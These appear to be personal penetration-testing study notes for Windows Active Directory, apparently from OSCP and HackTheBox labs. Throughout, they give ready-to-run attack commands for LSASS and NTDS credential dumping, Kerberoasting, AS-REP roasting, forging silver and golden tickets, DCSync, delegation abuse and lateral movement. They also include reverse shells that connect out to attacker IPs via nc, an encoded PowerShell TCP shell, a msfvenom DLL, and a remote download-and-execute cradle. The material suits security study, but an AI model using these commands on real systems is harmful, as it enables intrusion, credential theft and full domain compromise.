As per this guide - create a malicious tzres.dll and copy to C:\Windows\System32\wbem\tzres.dll

Run systeminfo to execute tzres.dll and obtain a shell

WerTrigger

Run this WerTrigger exploit

SeRestorePrivilege

Use an exploit to elevate privileges using the SeRestorePrivilege

Create a reverse shell

Use the exploit to execute that reverse shell as Admin

Catch the reverse shell

Local Service (upgrade to full privileges)

Via a scheduled Task

As per Offsec guide for Squid

$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.45.211 4444 -e cmd.exe`""
 
Register-ScheduledTask -Action $TaskAction -TaskName "GrantPerm"
 
Start-ScheduledTask -TaskName "GrantPerm"

Autologon

Check for autologon credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 

Logon Sessions (PuTTY etc.)

PuTTY

SessionGopher (can do more than PuTTY, see Hacktricks for source)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Manually

reg query "HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions"

Password spraying

Linux host

# Bash one liner 
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
 
# Kerbrute
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1
 
# CME
crackmapexec smb 172.16.5.5 -u valid_users.txt -p 'Password123' --continue-on-success | grep +
crackmapexec smb 10.10.10.169 -u users.txt -p passwords.txt
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 # validate

Windows host

# Kerbrute
PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
 
# LDAP
# https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/Spray-Passwords.ps1
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin
 
# DomainPasswordSpray.ps1
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

Hash spraying

From a Linux host

crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

Credential harvesting on the network

Responder (Linux)

responder -I ens224
 
# logs stored at /usr/share/responder/logs

Inveigh (Windows)

PS C:\htb> Import-Module .\Inveigh.ps1
 
# LLMNR and NBNS spoofing
# Output to console
# Write to file
PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
 
# C# version (no longer updated)
# Hit ESC to enter/exit interactive console
PS C:\htb> .\Inveigh.exe
 
# \<interactive console>
HELP
GET NTLMV2UNIQUE
GET NTLMV2USERNAMES

Dump cached logon hashes

Requires

• Login credentials
• SYSTEM or local admin permissions
• SeDebugPrivilege (might come with the admin privileges)

Using Mimikatz

Start PowerShell as admin and load Mimikatz:

PS C:\Tools\> .\mimikatz.exe

Engage SeDebugPrivilege:

mimikatz # privilege::debug

Dump hashes:

mimikatz # sekurlsa::logonpasswords

Using SysInternals (bypass AV)

1. Dump the LSASS

Locally:

C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

Remotely:

net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

2. Parse the dump on attacking machine

Load the dump:

mimikatz # sekurlsa::minidump lsass.dmp

Extract credentials:

mimikatz # sekurlsa::logonPasswords

Dump cached Kerberos tickets

Requires

• Login credentials
• SYSTEM or local admin permissions

Using Mimikatz

Start PowerShell as admin and load Mimikatz:

PS C:\Tools\> .\mimikatz.exe

Engage SeDebugPrivilege:

mimikatz # privilege::debug

Dump tickets:

mimikatz # sekurlsa::tickets

AS-REP Roasting

Exploit - If an account has Kerberos pre-authentication disabled, we could force it to send us a message encrypted with its password, then attempt to decrypt that password

However, if preauthentication is disabled, an attacker could request authentication data for any user and the DC would return an AS-REP message. Since part of that message is encrypted using the user’s password, the attacker can then attempt to brute-force the user’s password offline.

Find vulnerable accounts

PowerView

PS C:\htb> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Impacket

# Null
GetNPUsers.py inlanefreight.local/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users
 
# Credentialed
impacket-GetNPUsers -request -dc-ip 172.16.133.200 oscp.exam/c.rogers:SqueakyRedDesk111

Obtain AS-REP hash

Rubeus

# Any
PS C:\Tools> .\Rubeus.exe asreproast /nowrap [/format:hashcat] [/outfile:C:\Temp\hashes.txt]
# Single
PS C:\htb> .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Impacket

# Single
impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/pete
# List
impacket-GetNPUsers -dc-ip 10.10.10.161 -usersfile ./users.txt htb.local/
# No password
impacket-GetNPUsers -dc-ip 10.10.10.161 -usersfile ./users.txt htb.local/ -no-pass

Kerbrute (brute force)

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175

Cracking the obtained hashes

Hashcat

# Find hash type
kali@kali:~$ hashcat --help | grep -i "Kerberos"
# Crack
kali@kali:~$ hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting

Exploit - obtain a TGS that is encrypted with an SPN account's password hash then attempt to decrypt that password

Obtain an SPN account hash

Windows - rubeus

# The identified SPNs will relate to the domain user that the command is run in the context of
 
PS C:\Tools> .\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.kerberoast
PS C:\htb> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap  # admin accounts, no column wrap

Windows - manually

# Obtain with NET classes
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "\<SPN>"
 
# Obtain with setspn.exe
PS C:\htb> setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
 
# Extract with Mimikatz
mimikatz # kerberos::list /export

Windows - PowerView

PS C:\htb> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Linux:

• -request to obtain the TGS and output them in a Hashcat compatible format
• -dc-ip to specify the IP address of the domain controller
• domain/user to specify which user to connect to the AD environment as

# Obtain all possible hashes
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete:Password123!
 
# Obtain hash for particular user
bubbleman@htb[/htb]$ GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Crack the obtained SPN account hash

TGS hash types

$krb5tgs$23$*  # RC4 (weak)
$krb5tgs$18$*  # AES-256 (strong)

tgsrepcrack.py

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Hashcat:

kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Test credentials against a DC

CME

bubbleman@htb[/htb]$ sudo crackmapexec smb 172.16.5.5 -u sqldev -p database!

Targeted Kerberoasting

Sees which users the current user has GenericWrite permissions, then for those users sets a temporary SPN to obtain hash for. Then deletes the SPN upon completion.

Obtain SPN hash (setting a SPN if possible)

targetedKerberoast.py

# Any user
python targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.209.40
 
# Particular user
python targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.209.40 --request-user hazel.green

Silver Tickets

Exploit - With a service's hash we can forge a TGS which has any permissions on that service that we desire

Requires - hash of a SPN, domain SID, and SPN

Limitation - can no longer get silver tickets for non-existent accounts

Since silver and golden tickets represent powerful attack techniques, Microsoft created a security patch to update the PAC structure.5 With this patch in place, the extended PAC structure field PAC_REQUESTOR needs to be validated by a domain controller. This mitigates the capability to forge tickets for non-existent domain users if the client and the KDC are in the same domain. Without this patch, we could create silver tickets for domain users that do not exist. The updates from this patch are enforced from October 11, 2022.

Info - What is a silver ticket?

Remembering the inner workings of the Kerberos authentication, the application on the server executing in the context of the service account checks the user’s permissions from the group memberships included in the service ticket. However, the user and group permissions in the service ticket are not verified by the application in a majority of environments. In this case, the application blindly trusts the integrity of the service ticket since it is encrypted with a password hash that is, in theory, only known to the service account and the domain controller.

With the service account password or its associated NTLM hash at hand, we can forge our own service ticket to access the target resource (in our example, the IIS application) with any permissions we desire. This custom-created ticket is known as a silver ticket and if the service principal name is used on multiple servers, the silver ticket can be leveraged against them all.

In general, we need to collect the following three pieces of information to create a silver ticket:

• SPN password hash
• Domain SID
• Target SPN

Obtain the information required to forge a TGS

Obtain a SPN password hash

• If with admin privileges:
  1. dump cached logon passwords
  2. dump cached Kerberos tickets
• Else:
  1. AS-REP roasting
  2. Kerberoasting

Obtain the domain SID:

PS C:\Users\jeff> whoami /user

Obtain a target SPN by listing all SPNs (see Enumeration Active Directory section).

Create a forged TGS with the obtained information

Mimikatz

• /sid specifies the domain SID
• /domain specifies the domain name
• /target specifies where the SPN runs
• /service specifies the SPN protocol
• /rc4 specifies the SPN’s NTLM hash
• /ptt allows us to inject the forged ticket into the memory of the machine we execute the command on
• /user specifies an existing domain user

mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

Confirm the TGS is in memory:

PS C:\Tools> klist

Linux

impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator

See Nagoya box for an example of a silver ticket attack being used

DCSync Attack

Requires domain login credentials with Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set permissions. By default these groups have that...

Administrators Domains Admins Enterprise Admins

Exploit - Obtain a copy of the domain database which contains all user hashes

Luckily for us, the domain controller receiving a request for an update does not check whether the request came from a known domain controller. Instead, it only verifies that the associated SID has appropriate privileges. If we attempt to issue a rogue update request to a domain controller from a user with certain rights it will succeed.

Using Mimikatz

Load Mimikatz:

PS C:\Tools\> .\mimikatz.exe

Perform the DCSync attack:

mimikatz # lsadump::dcsync /user:corp\dave
mimikatz # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator

Using impacket-secretsdump

• -just-dc-user to specify the user to obtain hash for
• domain/user:password@ip to specify the credentials of the domain user with the necessary permissions as well as the IP address of the DC

kali@kali:~$ impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70

Crack obtained NTLM hash

With Hashcat:

kali@kali:~$ hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Golden Ticket

Requires - the krbtgt hash

Exploit - With the krbtgt hash we can forge TGTs, allowing us to forge any TGSs

Purge any existing kerberos tickets

With Mimikatz:

mimikatz # kerberos::purge

---

With cmd:

klist purge

Launch a new cmd process with an injected golden TGT with Mimikatz

Get the domain SID for the Mimikatz command:

C:\Users\pete> whoami /user

---

Create the golden ticket with Mimikatz:

• /krbtgt (instead of /rc4) to specify that we are supplying the password hash of the krbtgt user account
• We specify an existing domain user, jen (before Microsoft patched Windows in July 2022, we didn’t have to)

mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt

---

Launch a new cmd process with the injected golden ticket:

mimikatz # misc::cmd

On the new cmd process use PsExec to start a remote session

• Specify the remote machine with the dns name rather than IP address, otherwise NTLM authentication would be used and not the golden Kerberos ticket and would fail

C:\Tools\SysinternalsSuite>PsExec.exe \\dc1 cmd.exe

Shadow Copies

Requires - Member of the Domain Admins group

Abuse the vshadow utility to create a copy of the AD database and extract every user credential

Create a shadow copy of the NTDS.dit

Launch an elevated command prompt.

---

Create a shadow copy with vshadow.exe

• -nw to disable writers, which speeds up backup creation
• -p option to store the copy on disk

C:\Tools>vshadow.exe -nw -p  C:

---

Note the device name.

Backup the current NTDS.dit and system registry hive

NTDS.dit:

C:\Tools>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

---

System registry hive:

C:\>reg.exe save hklm\system c:\system.bak

Extract credentials from the NTDS.dit using the system registry hive

• -ntds to provide the ntds.dit backup file we created
• -system to provide the backup system registry file
• LOCAL to parse the files locally

kali@kali:~$ impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

Group Membership

DnsAdmins

We have the ability to cause the DNS service to load a DLL of our choosing upon starting up.

Create the DLL

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=9001 -f dll > rev.dll

Link the DLL to the DNS service

dnscmd.exe /config /serverlevelplugindll \\10.10.14.13\share\rev.dll

Make the DLL reachable

# On Kali (in folder containing rev.dll)
impacket-smbserver share .
 
# Create a listener
rlwrap nc -lvnp 9001

Stop and start and DNS service

sc.exe stop dns
sc.exe start dns

Permissions

GenericAll

On a computer object (Kerberos Resource-based Constrained Delegation)

First check that the requirements are all OK as per this guide

• RESOURCEDC = victim with GenericAll permissions over
• FAKE01 = created computer object
• FAKE01$ = created computer account for the computer object

Add a computer account

# impacket
impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.167.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'FAKE01$' -computer-pass '123456'
 
# addcomputer.py
addcomputer.py -method LDAPS -computer-name 'FAKE01$' -computer-pass '123456' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'
 
# powermad
import-module powermad
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Check that the computer was created

Get-DomainComputer fake01
get-adcomputer fake01

Set the delegation attribute for the created machine account

# AD PS module
Set-ADComputer resourcedc -PrincipalsAllowedToDelegateToAccount FAKE01$
 
# PowerView
$ComputerSid = Get-DomainComputer FAKE01 -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer resourcedc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
 
# PowerView
Get-DomainComputer resourcedc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
 
# rbcd.py
# -t target machine (victim with GenericAll permissions over)
sudo python3 /opt/rbcd-attack/rbcd.py -dc-ip 192.168.167.175 -t RESOURCEDC -f 'FAKE01' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone

Check that delegation was successful

# AD PS module
Get-ADComputer -Identity "resourcedc" -Properties msds-AllowedToActOnBehalfOfOtherIdentity | Select-Object -ExpandProperty msds-AllowedToActOnBehalfOfOtherIdentity
 
# PowerView
Get-DomainComputer resourcedc -Properties 'msds-allowedtoactonbehalfofotheridentity'

Perform a S4U attack (see linked guide above or HackTricks)

…Or get the Administrator service ticket (as per this guide)

# 1 Get ticket
impacket-getST -spn cifs/resourcedc.resourced.local resourced/attack\$:'FAKE01' -impersonate Administrator -dc-ip 192.168.167.175
 
# 2 Set environment variable
export KRB5CCNAME=./Administrator.ccache
 
# 3 Add victim IP to hosts file
sudo sh -c 'echo "192.168.167.175 resourcedc.resourced.local" >> /etc/hosts'
 
# 4 Psexec as Administrator using the cached Administrator kerberos ticket
sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.167.175

Lateral Movement

WMI (wmic.exe / PS WMI)

Requires - credentials for user with Administrators membership on remote machine

Limitation - The wmic utility is now deprecated

[Update - January 2024]: Currently, WMIC is a Feature on Demand (FoD) that’s preinstalled by default in Windows 11, versions 23H2 and 22H2. In the next release of Windows, the WMIC FoD will be disabled by default.

Read more.The WMIC utility is deprecated in Windows 10, version 21H1 and the 21H1 General Availability Channel release of Windows Server. This utility is superseded by Windows PowerShell for WMI. Note: This deprecation applies to only the command-line management utility. WMI itself isn’t affected.

Spawn a remote process (eg. calculator) with wmic.exe

• Launch the calculator app as jen on machine 192.168.50.73

C:\Users\jeff>wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"

Spawn a remote process with PowerShell WMI

Launch the calculator app on 192.168.50.73 as jen:

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
 
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options 
$command = 'calc';
 
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

Spawn a reverse shell with PowerShell WMI

Encode the reverse shell:

• Send the reverse shell to 192.168.118.2 (Kali)

encode.py

import sys
import base64
 
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
 
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
 
print(cmd)

Execute the encoding script:

kali@kali:~$ python3 encode.py

Execute the following commands to execute the reverse shell on the remote machine as jen:

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
 
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options 
$command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';
 
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

Setup a listener on Kali:

kali@kali:~$ nc -lnvp 443

psexec.exe

Requires - (1) Username and hash/password for user with Administrator membership on remote machine (2) ADMIN$ share available (it is by default) (3) File and Printer Sharing enabled (it is by default)

Using psexec.exe

• Launch PsExec64.exe (comes as part of the sysinternalssuite)
• \\FILES04 to specify what machine to remote to
• -u to specify which user the remote session will be associated with
• -p to specify that user’s password

PS C:\Tools\SysinternalsSuite> ./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

impacket-wmiexec/psexec

Requires - (1) Username and hash/password for user with Administrator membership on remote machine (2) ADMIN$ share available (it is by default) (3) File and Printer Sharing enabled (it is by default)

Limitation - The 2014 security update prevented this technique from being used to authenticate as an account in the local Administrators group (apart from the built-in Administrator account).

Using impacket-wmiexec

With a hash:

kali@kali:~$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E [email protected]

With a password:

kali@kali:~$ /usr/bin/impacket-wmiexec [email protected]

Using impacket-psexec

With a password:

• Obtain the shell as the user john on machine 10.10.10.1

kali@kali:~$ /usr/bin/impacket-psexec corp.local/john:[email protected]

With a hash:

• Zeros for the LM part of the hash, the other part is the NTLM hash

kali@kali:~$ /usr/bin/impacket-psexec -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]

WinRM (winrs.exe / PS remoting)

Requires - credentials for a user with Administrators or Remote Management Users membership on remote machine

Via winrs.exe

• -r to specify the target machine
• -u and -p to specify the username and password of the user to execute the command

Execute a simple command:

C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"

Execute a reverse shell (using the encoded payload as in the WMI section):

C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123! "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAF MAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD... HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

Via PowerShell remoting

PS C:\Users\jeff> $username = 'jen';  
PS C:\Users\jeff> $password = 'Nexus123!';  
PS C:\Users\jeff> $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;  
PS C:\Users\jeff> $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
PS C:\Users\jeff> New-PSSession -ComputerName 192.168.50.73 -Credential $credential
PS C:\Users\jeff> Enter-PSSession 1

Evil-WinRM

Limitation - (1) password/hash for user with Administrators membership on remote machine and (2) winrm must be enabled on the remote host (is port 5895 or 5896 open?)

Use evil-winrm

With a password:

kali@kali:~$ evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"

With a NTLM hash:

kali@kali:~$ evil-winrm -i 192.168.50.220 -u daveadmin -H "32196B56FFE6F45E294117B91A83BF38!"

Load a script into memory while logging in: (Might need to bypass AMSI - more information here).

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz

RDP

Using xfreerdp

Using a password:

kali@kali:~$ xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833

Using a hash:

kali@kali:~$ xfreerdp /u:rdp_admin /pth:8846f7eaee8fb117ad06bdd830b7586c /v:127.0.0.1:9833

Overpass the hash

Requires - a hash & username

Exploit - NTLM hash → TGT

Use Mimikatz to obtain a TGT, then use PsExec to obtain a remote session

• /user to specify the user to obtain a TGT for
• /domain to specify which domain the TGT should be valid for
• /ntlm to specify the NTLM hash of the /user
• /run to specify the process to create (eg. PowerShell)

mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

(For example) then run PsExec in the generated PowerShell process:

PS C:\Windows\system32> cd C:\tools\SysinternalsSuite\
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\files04 cmd

Pass the Ticket

Requires - a cached TGS

Exploit - Cached TGS → access resource as another user

Obtain a cached TGS in the LSASS memory

Find and export any tickets:

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

Review the exported tickets:

PS C:\Tools> dir *.kirbi

Inject a TGS into memory with Mimikatz

Inject a ticket for dave:

mimikatz # kerberos::ptt [0;12bd0][email protected]

Confirm the ticket is in memory:

PS C:\Tools> klist

Access a domain as the user linked to the injected TGS

We can now access the backup folder:

PS C:\Tools> ls \\web04\backup

Whereas before we couldn’t:

PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.

DCOM (Distributed Component Object Model)

Requires - Administrator privileges on the local machine.

Exploit - Use the Component Object Model to initiate a reverse shell

Initiate a process using the COM

• 192.168.50.73 is the remote machine

Spawn the calculator app on the remote machine:

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
\$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

Spawn a reverse shell on the remote machine:

\$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

Setup a listener on Kali:

kali@kali:~$ nc -lnvp 443

Runas

Via the command line

Invoke-RunasCs

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "nc.exe -e cmd.exe 192.168.45.201 80"

Runas (using saved credentials)

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Via the GUI

Runas

• /user to specify the username of the user
• cmd to start cmd shell

PS C:\Users\steve> runas /user:backupadmin cmd

Transfer Files

(Linux → Windows) Download and inject a .ps1 into memory

Inject PowerView into memory

IEX(New-Object Net.WebClient).downloadString('http://192.168.45.219/PowerView.ps1')

(Linux ↔ Windows) impacket-smbserver

Windows → Kali

# On Kali
impacket-smbserver -smb2support -username df -password df share .
 
# On victim

net use \\10.10.14.6\share /u:df df
 
copy file.zip \\10.10.14.4\share\
 
net use /d \\10.10.14.6\share   # delete the share

Kali → Windows

# On Kali (in folder to share)
smbserver.py -username df -password df share . -smb2support
 
# On Windows
net use \\10.10.14.30\share /u:df df
cd \\10.10.14.30\share\

(Linux ↔ Windows) evil-winrm

Upload

upload /relative/path/from/working/directory/file.txt [/destination/path/file.txt ]

Download

download /full/path/file.txt /full/path/destination/file.txt

(Linux ↔ Windows) SCP (SSH)

Linux → Windows

scp ./PsExec64.exe [email protected]:C:/Users/ariah/Downloads/psexec.exe

(Linux ↔ Windows) Base64 Encoding/Decoding

Encode a file

[Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\full\path\to\your\file"))

Miscellaneous

Fix clock skew error

sudo rdate -n 10.10.10.175
sudo ntpdate 10.10.10.175

PowerShell encoded reverse shell

On Kali:

pwsh
 
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out- String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng th);$stream.Flush()};$client.Close()'
 
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
 
$EncodedText =[Convert]::ToBase64String($Bytes)
 
$EncodedText
 
# returns:
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAzACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AIABTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAIAB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=